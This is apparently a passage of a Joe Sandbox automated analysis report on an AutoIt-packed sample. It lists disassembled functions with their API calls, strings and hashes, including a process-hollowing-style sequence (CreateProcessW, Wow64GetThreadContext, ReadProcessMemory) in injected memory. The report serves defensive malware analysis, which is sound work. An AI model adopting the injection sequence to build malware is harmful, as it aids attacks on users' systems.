Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction ID: 07ab5080992bb1cdff3ff47a7cbf48298d207aafe626c3fb7d1aef626f683212
Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction Fuzzy Hash: 5551D430A00B06DFDB24AFB9C88066E77A9AF40320F66C729F835963D0E7749D588B50

Uniqueness

Uniqueness Score: -1.00%

Function 009669CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00964F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00A262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00964F6F

_free.LIBCMT ref: 0099E68C
_free.LIBCMT ref: 0099E6D3

Part of subcall function 00966BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00966D0D

Strings

Bad directive syntax error, xrefs: 0099E6BB
>>>AUTOIT SCRIPT<<<, xrefs: 0099E462

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: ea8cd132bf2398510a45ea1b052be43b1103ff7d9e6fd934a3283621447b2445
Instruction ID: 5fa90dbc154f7e8c49501b2ed9ac8097d56167f04e2c0a76041d1a3a6dc78956
Opcode Fuzzy Hash: ea8cd132bf2398510a45ea1b052be43b1103ff7d9e6fd934a3283621447b2445
Instruction Fuzzy Hash: 6D917E71910219EFCF04EFA8CC91AEDB7B8FF59314F14446AF815AB2A1EB349945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 009635B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,009635A1,SwapMouseButtons,00000004,?), ref: 009635D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,009635A1,SwapMouseButtons,00000004,?,?,?,?,00962754), ref: 009635F5
RegCloseKey.KERNELBASE(00000000,?,?,009635A1,SwapMouseButtons,00000004,?,?,?,?,00962754), ref: 00963617

Strings

Control Panel\Mouse, xrefs: 009635D2

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: fc3283b4c47724acffa6feef82b486316ff299c27eeedbfaaa8dbb70592cddf2
Instruction ID: fe7845f7c904b7a3d0e58f5cc8fc9912dbb13a34b3e6d26e6abbbe35e7273f25
Opcode Fuzzy Hash: fc3283b4c47724acffa6feef82b486316ff299c27eeedbfaaa8dbb70592cddf2
Instruction Fuzzy Hash: D2115771614218BFDB20CF69DC81EAEBBBCEF05740F00846AF805DB210E2719F40ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 03E91300 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 03E91ABB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03E91B51
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03E91B73

Memory Dump Source

Source File: 00000000.00000002.2134404358.0000000003E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e90000_SecuriteInfo.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
Instruction ID: 1420393fd172615aab6db1888e89dc8e8b6948a7da9e45da3e31e7ef2b4d6e85
Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
Instruction Fuzzy Hash: 4F621B34A14259DBEB24CFA4C840BEEB376EF58304F1091A9D10DEB394E7769E81CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0098493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 009849D0
__flush.LIBCMT ref: 009849F0
__write.LIBCMT ref: 00984A23
__flsbuf.LIBCMT ref: 00984A51

Part of subcall function 00988D68: __getptd_noexit.LIBCMT ref: 00988D68

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction ID: 12e67b50c5f0b52f57c67a43867d9d43ee7b197ec7d1af2337418c617438139f
Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction Fuzzy Hash: FF41C2716406079BDF2CEEA9C8809AF77AAEF80760B24857DE855CB780EB75DD408B44

Uniqueness

Uniqueness Score: -1.00%

Function 009673E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0099EE62
GetOpenFileNameW.COMDLG32(?), ref: 0099EEAC

Part of subcall function 009648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009648A1,?,?,009637C0,?), ref: 009648CE

Part of subcall function 009809D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009809F4

Strings

X, xrefs: 0099EE7A

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: e131f8a76f77eaa960d77d2c3f8c4a14dfdd2c8b769b8000c2becbfa41ca4d0c
Instruction ID: ddb4311c1867d1cfaaf2516cce816fa4a2b9464739b7d253c11cc8cac760f3e4
Opcode Fuzzy Hash: e131f8a76f77eaa960d77d2c3f8c4a14dfdd2c8b769b8000c2becbfa41ca4d0c
Instruction Fuzzy Hash: EB21D8309042589BCF11DFD8C845BEEBBFD9F89314F04401AE408E7241DBB4598ACFA1

Uniqueness

Uniqueness Score: -1.00%

Function 009C901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 009C9036
__fread_nolock.LIBCMT ref: 009C904B

Strings

EA06, xrefs: 009C907D

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 96168ad8744e5a252f5471d6555693c92e48070bce2c786650df5241cdf2aa6b
Instruction ID: c86d8ba2d1ffa94c10157e7b576fae7688eb1a3b9d724a1ad7593af1a0c54415
Opcode Fuzzy Hash: 96168ad8744e5a252f5471d6555693c92e48070bce2c786650df5241cdf2aa6b
Instruction Fuzzy Hash: 07019671904258AEDB28DBA8CC5AFFE7BFC9B15301F00459FE552D6281E579A6088760

Uniqueness

Uniqueness Score: -1.00%

Function 009C9B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 009C9B82
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 009C9B99

Strings

aut, xrefs: 009C9B93

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: a6f1b8240b882d77d58bb574924fde0d0e2b863175d0d6d85bbeed2118ed844b
Instruction ID: 9aad4236f90c0a6373615b605c2a071835709a5c4d9c3d02a7ffa45915f3eed9
Opcode Fuzzy Hash: a6f1b8240b882d77d58bb574924fde0d0e2b863175d0d6d85bbeed2118ed844b
Instruction Fuzzy Hash: 34D05E7954430DBBDB109B94DC4EFDA772CE704700F0046A2BF64991A2DEB099989B92

Uniqueness

Uniqueness Score: -1.00%

Function 009DCDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eb6e46fed8c18d09a03ee73a48b243fa56cfd175f127c9b232bfe754c087426
Instruction ID: 875e85c720b34eef37645cc7991b97204d1abc5a99f5a40e161846fbfa401e02
Opcode Fuzzy Hash: 1eb6e46fed8c18d09a03ee73a48b243fa56cfd175f127c9b232bfe754c087426
Instruction Fuzzy Hash: D9F11571A083419FCB14DF28C584A6ABBE5BFC8314F14892EF8A99B351D735E945CF82

Uniqueness

Uniqueness Score: -1.00%

Function 0096F8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 009803A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 009803D3
Part of subcall function 009803A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 009803DB
Part of subcall function 009803A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009803E6
Part of subcall function 009803A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009803F1
Part of subcall function 009803A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 009803F9
Part of subcall function 009803A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00980401

Part of subcall function 00976259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0096FA90), ref: 009762B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0096FB2D
OleInitialize.OLE32(00000000), ref: 0096FBAA
CloseHandle.KERNEL32(00000000), ref: 009A49F2

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 3c642413cc368ba5ac0783c1905b8e3035ba36b40e9a2fbdf7f1d2fc4c4efe32
Instruction ID: 6d535cca8220b2714f6f42f0a2fe9edbbbd9f589696b4c18d8b8a92ed8c4bfa3
Opcode Fuzzy Hash: 3c642413cc368ba5ac0783c1905b8e3035ba36b40e9a2fbdf7f1d2fc4c4efe32
Instruction Fuzzy Hash: AE81A7B0903290CEC3A8EFADBA506757BE5FB98708710817AD499CB262EB3195078F50

Uniqueness

Uniqueness Score: -1.00%

Function 009643DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00964401
Shell_NotifyIconW.SHELL32(00000000,?), ref: 009644A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 009644C3

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 5b2e3a079d53a83d202ef4e4a3b468853d5e78918473ddf03f7e0712fcb9a648
Instruction ID: 2ca9f80d88a67dec732e17513d7a4f111625874df17dd4651dc8dc05544e6195
Opcode Fuzzy Hash: 5b2e3a079d53a83d202ef4e4a3b468853d5e78918473ddf03f7e0712fcb9a648
Instruction Fuzzy Hash: A4316170909701CFD721DFA4D885BA7BBE8FB49304F00093EE59A87251EB75A945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0098594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00985963

Part of subcall function 0098A3AB: __NMSG_WRITE.LIBCMT ref: 0098A3D2
Part of subcall function 0098A3AB: __NMSG_WRITE.LIBCMT ref: 0098A3DC

__NMSG_WRITE.LIBCMT ref: 0098596A

Part of subcall function 0098A408: GetModuleFileNameW.KERNEL32(00000000,00A243BA,00000104,?,00000001,00000000), ref: 0098A49A
Part of subcall function 0098A408: ___crtMessageBoxW.LIBCMT ref: 0098A548

Part of subcall function 009832DF: ___crtCorExitProcess.LIBCMT ref: 009832E5
Part of subcall function 009832DF: ExitProcess.KERNEL32 ref: 009832EE

Part of subcall function 00988D68: __getptd_noexit.LIBCMT ref: 00988D68

RtlAllocateHeap.NTDLL(01620000,00000000,00000001,00000000,?,?,?,00981013,?), ref: 0098598F

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: bd8a37772d847100f9e3b4cdc3d8e558692aa3f30d5dbff07abd86886d68e2ed
Instruction ID: 669e52b71ce5383477dad66425646204cfe8f3266d1eabf7f7972323cc0ffa41
Opcode Fuzzy Hash: bd8a37772d847100f9e3b4cdc3d8e558692aa3f30d5dbff07abd86886d68e2ed
Instruction Fuzzy Hash: EC01F531200B15DEE6217B79DC42B7E728C8F92B70F92443AF4049A3C1EE769D0683A1

Uniqueness

Uniqueness Score: -1.00%

Function 009C9B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,009C97D2,?,?,?,?,?,00000004), ref: 009C9B45
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,009C97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 009C9B5B
CloseHandle.KERNEL32(00000000,?,009C97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009C9B62

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: ac5e5df9270e2d262af0cf73bca9bde53f41d7bbe1b0528dc257b142c9df9b01
Instruction ID: c050418a7b20caa072c9ba555754523cada1bba70428a2518eb1735320043af6
Opcode Fuzzy Hash: ac5e5df9270e2d262af0cf73bca9bde53f41d7bbe1b0528dc257b142c9df9b01
Instruction Fuzzy Hash: C4E08632584218B7D7211B54EC49FCA7B28AB05761F108121FB146D0E087B16D11A799

Uniqueness

Uniqueness Score: -1.00%

Function 009C8F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 009C8FA5

Part of subcall function 00982F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00989C64), ref: 00982FA9
Part of subcall function 00982F95: GetLastError.KERNEL32(00000000,?,00989C64), ref: 00982FBB

_free.LIBCMT ref: 009C8FB6
_free.LIBCMT ref: 009C8FC8

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: efa5cfa9b1b2f41bce9affd07bef402890ef9bb67adc050918c04926c1923072
Instruction ID: 28cd069cc8770b419067857193b57b50050067940ee9906ad016a454f91cef56
Opcode Fuzzy Hash: efa5cfa9b1b2f41bce9affd07bef402890ef9bb67adc050918c04926c1923072
Instruction Fuzzy Hash: 82E012B1A0D7015ACA24B678ED44F9357EE5F88350B18081DB509DB282DE24E841C2A4

Uniqueness

Uniqueness Score: -1.00%

Function 0096AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 009A002B

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 425f65664847cbab0f8557929ab93b05a20217b28b8d9784f4aa4798781d9f2b
Instruction ID: bcb7af177354ebd379ca4f2ef29752773bf76ba73db2a8c50b8ca318890c1c30
Opcode Fuzzy Hash: 425f65664847cbab0f8557929ab93b05a20217b28b8d9784f4aa4798781d9f2b
Instruction Fuzzy Hash: 16224670508341CFCB24DF14C490B6ABBE5BF85314F15896DE88A9B362DB35ED85CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00964DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00964E1A

Strings

EA06, xrefs: 0099DCF5

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 5ccc3149e2905fdfe734dbbe502f5538982292feed1b18fd690dde61b05af445
Instruction ID: ec02eb10689ce34cb4d6ec744005493476d903727d70be79dbec88d33a03d356
Opcode Fuzzy Hash: 5ccc3149e2905fdfe734dbbe502f5538982292feed1b18fd690dde61b05af445
Instruction Fuzzy Hash: BF419031A04154ABDF135FE4DC517BF7F66AF45300F684475F8829B282C6269D40C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 0096492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00964992

Part of subcall function 009835AC: __lock.LIBCMT ref: 009835B2
Part of subcall function 009835AC: DecodePointer.KERNEL32(00000001,?,009649A7,009B81BC), ref: 009835BE
Part of subcall function 009835AC: EncodePointer.KERNEL32(?,?,009649A7,009B81BC), ref: 009835C9

Part of subcall function 00964A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00964A73
Part of subcall function 00964A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00964A88

Part of subcall function 00963B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00963B7A
Part of subcall function 00963B4C: IsDebuggerPresent.KERNEL32 ref: 00963B8C
Part of subcall function 00963B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00A262F8,00A262E0,?,?), ref: 00963BFD
Part of subcall function 00963B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00963C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 009649D2

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: e801558a2650f781f1dd47a40f95655d4e8353f5ae70b7c7cd4a4b5a4330e904
Instruction ID: 17309d6b8da2f685546fcc0e077a68d6d7c3f2ceb43115f5ad9ae6a63be9304f
Opcode Fuzzy Hash: e801558a2650f781f1dd47a40f95655d4e8353f5ae70b7c7cd4a4b5a4330e904
Instruction Fuzzy Hash: BC118C719193519FC310EFA8DC45AAABBE8EBD8710F00852EF045872A1DB709A46CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00965DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00965981,?,?,?,?), ref: 00965E27
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00965981,?,?,?,?), ref: 0099E19C

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

